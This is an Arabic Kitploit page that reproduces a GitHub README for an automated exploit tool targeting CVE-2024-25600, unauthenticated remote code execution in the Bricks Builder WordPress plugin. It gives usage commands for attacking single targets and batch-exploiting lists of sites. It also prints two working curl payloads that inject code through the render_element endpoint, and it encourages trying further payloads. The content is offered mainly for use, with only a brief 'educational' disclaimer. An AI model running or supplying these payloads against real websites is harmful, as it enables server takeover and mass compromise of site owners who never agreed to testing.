Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/kasoomi0228/cve-2024-25600-bricks-builder-wordpress
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubkasoomi0228/cve-2024-25600-bricks-builder-wordpress

CVE-2024-25600-Bricks-Builder-WordPress

أداة استغلال آلية لثغرة CVE-2024-25600، تتيح تنفيذ الأوامر عن بُعد دون مصادقة على مواقع ووردبريس التي تستخدم إضافة Bricks Builder. تدعم الأوضاع التفاعلية والدفعية لتنفيذ الأوامر.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد
مشاركة

CVE-2024-25600 أداة استغلال الثغرة 🚀

الوصف 📝

هذه الأداة 🛠️ مصممة لاستغلال الثغرة الأمنية CVE-2024-25600 🕳️ الموجودة في إضافة Bricks Builder الخاصة بووردبريس. تسمح الثغرة بتنفيذ أكواد عن بُعد دون مصادقة على المواقع المتأثرة 💻. تعمل الأداة على أتمتة عملية الاستغلال من خلال استرجاع الـ nonces وإرسال طلبات مصممة خصيصًا لتنفيذ أوامر اعتباطية.

الميزات 🌟

  • الوضع التفاعلي: تفاعل مع الموقع المستهدف في الوقت الفعلي 🕹️.
  • وضع الدفعة: فحص واستغلال عدة مواقع من قائمة 📋.
  • تنفيذ الأوامر: تنفيذ أوامر اعتباطية على الخادم المستهدف ⚙️.

التثبيت 🛠️

  1. استنسخ هذا المستودع إلى جهازك المحلي 🖥️ باستخدام git clone.
  2. انتقل إلى دليل المستودع المستنسخ.
  3. ثبّت مكتبات بايثون المطلوبة باستخدام pip install -r requirements.txt.

الاستخدام 📖

الوضع التفاعلي 🎮

  1. شغّل الأداة باستخدام python exploit.py -u <URL> لبدء الوضع التفاعلي.
  2. اتبع التعليمات التي تظهر على الشاشة لإرسال الأوامر إلى الخادم المستهدف.

وضع الدفعة 📊

  1. جهّز ملفًا نصيًا يحتوي على قائمة بعناوين URL المستهدفة.
  2. شغّل الأداة باستخدام python exploit.py -l <file_path> لفحص واستغلال المواقع المدرجة.

إثبات المفهوم (PoC) 📝

إن إثبات المفهوم الأساسي المقدم من الكشف هو كما يلي:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

تحديث: إثبات المفهوم الثاني (أكثر موثوقية)

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

من المحتمل أن تؤدي حمولات إضافية إلى نتائج أفضل. إذا لم يعمل استغلالي أو إثبات المفهوم معك، أشجعك على تجربة حمولات بديلة لإيجاد حل أكثر فعالية.

استبدل [HOST] بالموقع المستهدف و [NONCE] بقيمة الـ nonce المسترجعة من الموقع.

المرجع 📖

لمزيد من المعلومات حول الثغرة الأمنية CVE-2024-25600، يرجى الرجوع إلى الكشف المفصل على Snicco.io.

إخلاء المسؤولية ⚠️

المعلومات الواردة في هذا README مخصصة للأغراض التعليمية فقط. الاختراق غير المصرح به للمواقع أو الشبكات غير قانوني وغير أخلاقي. 🚫

شكر وتقدير 🙏

نشكر الباحثين الأمنيين الذين اكتشفوا وأبلغوا عن هذه الثغرة، وزودوا المجتمع بالمعلومات والأدوات التي تساعد في تأمين تطبيقات الويب الخاصة بهم.

تنزيل الأداة